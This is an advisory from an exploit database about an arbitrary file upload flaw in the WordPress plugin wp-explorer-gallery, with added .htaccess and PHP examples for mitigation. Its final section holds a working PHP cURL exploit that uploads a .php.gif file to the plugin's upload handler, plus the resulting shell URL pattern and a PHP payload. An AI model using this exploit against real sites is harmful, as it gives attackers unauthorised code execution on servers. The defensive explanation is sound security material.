WordPress plugins wp-explorer-gallery Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability has been found in the WordPress plugin wp-explorer-gallery. The plugin's upload handler accepts files with a double extension such as shell.php.gif, and on Apache hosts where PHP is bound with AddHandler, mod_mime treats every dot-separated segment of the name as an extension, so the stored file is executed as PHP. The proof of concept below posts the file without any WordPress session, which gives an attacker the ability to reach the server and run exploits, scripts and malware on it.
As with every WordPress upload vulnerability, the fix is to download the current version of the plugin from the WordPress site and update; if no fixed version exists, add an .htaccess rule under wp-content/uploads that denies names containing a .php segment anywhere (so php.gif-style double extensions are blocked as well, not only names ending in .php) and removes any PHP handler from that directory. Note that .htaccess only takes effect where Apache's AllowOverride permits it, and nginx/php-fpm deployments ignore it entirely.
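The following .htaccess implements the fallback described above for wp-content/uploads on Apache 2.4. It is an added example, not part of the original advisory or the plugin, and it assumes AllowOverride allows FileInfo and AuthConfig directives in that directory:

```apache
# wp-content/uploads/.htaccess  (added example, not from the advisory)
#
# mod_mime treats every dot-separated segment as an extension, so with
# "AddHandler application/x-httpd-php .php" a request for shell.php.gif
# still reaches the PHP handler. Deny any name that carries a PHP-style
# segment anywhere, not only at the end. (?i) makes the match
# case-insensitive so Shell.PHP.gif is caught too.
<FilesMatch "(?i)\.(php|phtml|phar|php[0-9])(\.|$)">
    Require all denied
</FilesMatch>

# Belt and braces: make sure nothing in this directory is ever mapped to a
# PHP handler or MIME type, even if a name slips past the pattern above.
RemoveHandler .php .phtml .phar
RemoveType    .php .phtml .phar
```

The server-level fix that makes this unnecessary is to bind PHP with `<FilesMatch "\.php$"> SetHandler ...` in the main configuration instead of AddHandler; then only names that truly end in .php are executed. Verify the rule by requesting a harmless test.php.gif placed in the directory and confirming a 403 rather than PHP output.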

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins  -  wp-explorer-gallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => nO x)
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-explorer-gallery.zip
####
 
#=> Exploit Info :
------------------
# The attacker can upload file/shell.php.gif: the allow-list below only looks
# at the trailing extension, so "gif" passes while the ".php" segment remains
# in the stored name.
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-';     // Characters allowed in the file name (in a Regular Expression format)
------------------
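To make the failure concrete, the PHP below contrasts a trailing-extension allow-list check, written to match the behaviour the advisory describes, with a handler that ignores the client-supplied name altogether. This is an added example, not code from wp-explorer-gallery or SWFUpload; the function names, the constructed polyglot upload and the temp-file handling are the example's own assumptions.

```php
<?php
// Added example, not code from wp-explorer-gallery or SWFUpload.

// Weak check: compares only the last dot-separated segment against the
// allow-list, so "shell.php.gif" is accepted as a GIF. Apache's mod_mime,
// when PHP is bound with AddHandler, treats ".php" anywhere in the name as
// an extension and runs the file.
function weakExtensionOk(string $clientName, array $allowed): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}

// Strict name check: exactly one extension, and it must be on the allow-list,
// so a second extension such as ".php" is rejected outright.
function strictNameOk(string $clientName, array $allowed): bool
{
    $parts = explode('.', strtolower(basename($clientName)));
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;               // no extension, dotfile, or double extension
    }
    return in_array($parts[1], $allowed, true);
}

// Safe storage: never reuse the client's name. Verify the content's magic
// bytes against the allowed image types and store under a random name with
// exactly one, server-chosen extension. A file that still smuggles PHP inside
// a valid GIF header cannot execute because no handler matches ".gif".
function safeStoredName(string $tmpPath, array $allowed): ?string
{
    $signatures = [
        'jpg' => "\xFF\xD8\xFF",
        'png' => "\x89PNG\r\n\x1A\n",
        'gif' => "GIF8",            // GIF87a / GIF89a
    ];
    $head = (string) file_get_contents($tmpPath, false, null, 0, 8);
    foreach ($signatures as $ext => $sig) {
        if (in_array($ext, $allowed, true) && strncmp($head, $sig, strlen($sig)) === 0) {
            return bin2hex(random_bytes(16)) . '.' . $ext;
        }
    }
    return null;                    // not an allowed image: reject the upload
}

// Demonstration with the advisory's allow-list and the advisory's file name.
$allowed = ['jpg', 'gif', 'png'];
$name    = 'shell.php.gif';

printf("weak check   : %s\n", weakExtensionOk($name, $allowed) ? 'accepted' : 'rejected');
printf("strict check : %s\n", strictNameOk($name, $allowed) ? 'accepted' : 'rejected');

// Constructed temp file: a GIF header followed by a PHP payload (polyglot).
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a<?php phpinfo(); ?>");
$stored = safeStoredName($tmp, $allowed);
printf("stored as    : %s\n", $stored ?? 'rejected');
unlink($tmp);

// In a real handler, finish with:
//   is_uploaded_file($_FILES['Filedata']['tmp_name'])
//   move_uploaded_file($tmp, $uploadDir . '/' . $stored)
// and serve $uploadDir from a location that has no PHP handler at all.
```

The magic-byte check is defence in depth only: a polyglot that starts with GIF89a is still stored, as the demonstration shows. What actually prevents execution is that the server chooses the stored name and that name carries a single, non-executable extension in a directory with no PHP handler.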
 
-----------
#=> Exploit 
-----------
<?php
// Upload zik.php.gif through the plugin's bundled SWFUpload handler.
// The handler's allow-list accepts the file because its trailing extension
// is "gif"; on an Apache host where PHP is bound with AddHandler, the stored
// file is still executed as PHP.
$uploadfile = "zik.php.gif";
$target     = "http://[target]/[path]/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    // CURLFile replaces the legacy "@$uploadfile" syntax, which PHP 7 removed.
    'Filedata' => new CURLFile($uploadfile, 'image/gif', $uploadfile),
    'folder'   => '/wp-content/uploads//',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The response tells you whether the upload was accepted.
print $postResult;
?>
 
Shell Access : http://[target]/[path]/wp-content/uploads/random_name.php.gif
(the handler stores the file under a random name but keeps the .php.gif extension)
 
Contents of zik.php.gif, which runs as PHP when that URL is requested:
<?php
phpinfo();
?>
 
------------------------------
